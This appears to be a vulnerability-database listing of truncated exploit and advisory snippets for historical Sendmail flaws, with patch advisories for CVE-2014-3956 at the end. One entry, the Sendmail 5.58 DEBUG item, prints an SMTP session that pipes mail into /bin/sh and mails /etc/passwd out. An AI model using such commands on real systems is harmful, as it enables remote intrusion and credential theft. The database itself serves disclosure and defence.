Eric Allman Sendmail 8.9.1/8.9.3 ETRN Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/904/info There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server forks and sleeps for 5 seconds. If many ETRN commands are...

Sendmail 8.11/8.12 Debugger Arbitrary Code Execution Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. The problem is the result of the use of signed integers in the program's tTflag function, which is responsible for processing arguments...

ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

Sendmail 8.11/8.12 Debugger Arbitrary Code Execution Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. The problem is the result of the use of signed integers in the program's tTflag function, which is responsible for processing arguments...

Sendmail 8.11/8.12 Debugger Arbitrary Code Execution Vulnerability (3)

No description provided by source. source: http://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. The problem is the result of the use of signed integers in the program's tTflag function, which is responsible for processing arguments...

Sendmail 8.11/8.12 Debugger Arbitrary Code Execution Vulnerability (4)

No description provided by source. source: http://www.securityfocus.com/bid/3163/info An input validation error exists in Sendmail's debugging functionality. The problem is the result of the use of signed integers in the program's tTflag function, which is responsible for processing arguments...

Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC

No description provided by source. !/usr/bin/env python [email protected] Sendmail 8.13.5 and below Remote Signal Handling exploit usage: rbl4ck-sendmail.py 127.0.0.1 0 25 this exploit was leaked to the PHC Phrack High Council so instead of only letting them have a copy, we figure everyon...

Caldera OpenLinux 2.2 ,Debian 2.1/2.2,RedHat <= 6.0 Vixie Cron MAILTO Sendmail Vulnerability

No description provided by source. Caldera OpenLinux 2.2 ,Debian Linux 2.1/2.2,RedHat Linux = 6.0 Vixie Cron MAILTO Sendmail Vulnerability source: http://www.securityfocus.com/bid/611/info Failure by the vixie cron daemon from validating the contents of a user supplied environment variable allow ...

Sendmail 8.6.9 IDENT Remote root Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2311/info A vulnerability in the IDENT function of sendmail 8.6.9 allows attackers to obtain remote root access. Very little other information on this vulnerability is currently available; this is an old vulnerability. it...

Eric Allman Sendmail 8.8 .x Socket Hijack Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/774/info Through exploiting a combination of seemingly low-risk vulnerabilities in sendmail, it is possible for a malicious local user to have an arbitrary program inherit or hijack the file descriptor for the socket...

BSD 2,CND 1,Sendmail 8.x,FreeBSD 2.1.x,HP-UX 10.x,AIX 4,RedHat 4 Sendmail Daemon Vuln

No description provided by source. BSD/OS 2.1,Caldera Network Desktop 1.0,Eric Allman Sendmail = 8.8.2,FreeBSD 2.1.5/2.1.6,HP-UX = 10.20,AIX 4.2,RedHat 4.0 Sendmail Daemon Mode Vulnerability source: http://www.securityfocus.com/bid/716/info Sendmail is often run in daemon mode so that it can list...

Berkeley Sendmail 5.58 DEBUG Vulnerability

No description provided by source. 220 mail.victim.com SMTP helo attacker.com 250 Hello attacker.com, pleased to meet you. debug 200 OK mail from: /dev/null 250 OK rcpt to:|sed -e '1,/^$/'d | /bin/sh ; exit 0 250 OK data 354 Start mail input; end with CRLF.CRLF mail [email protected] /etc/passwd...

Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial of Service Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/4822/info Sendmail is a MTA for Unix and Linux variants. There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on...

sendmail 8.11.6 Address Prescan Memory Corruption Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7230/info A vulnerability in Sendmail may be exploited remotely to execute arbitrary code. The flaw is present in the 'prescan' procedure, which is used for processing email addresses in SMTP headers. This condition has...

ClamAV Milter Blackhole-Mode Remote Code Execution

No description provided by source. $Id: clamavmilterblackhole.rb 10617 2010-10-09 06:55:52Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and...

Sendmail 8.9.x/8.10.x/8.11.x/8.12.x File Locking Denial of Service Vulnerability (2)

No description provided by source. source: http://www.securityfocus.com/bid/4822/info Sendmail is a MTA for Unix and Linux variants. There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on...

Fedora Update for sendmail FEDORA-2014-7095

The remote host is missing an update for the SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

MGASA-2014-0270 Updated sendmail packages fix CVE-2014-3956

Updated sendmail packages fix security vulnerability: Sendmail before 8.14.9 does not properly closing file descriptors before executing programs. This bug could enable local users to interfere with an open SMTP connection if they can execute their own program for mail delivery e.g., via procmail...

Updated sendmail packages fix CVE-2014-3956

Updated sendmail packages fix security vulnerability: Sendmail before 8.14.9 does not properly closing file descriptors before executing programs. This bug could enable local users to interfere with an open SMTP connection if they can execute their own program for mail delivery e.g., via procmail...

Fedora 19 : sendmail-8.14.7-2.fc19 (2014-7095)

This is an update that fixes bug which can lead to sendmail leaking file descriptors to processes it spawns. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as...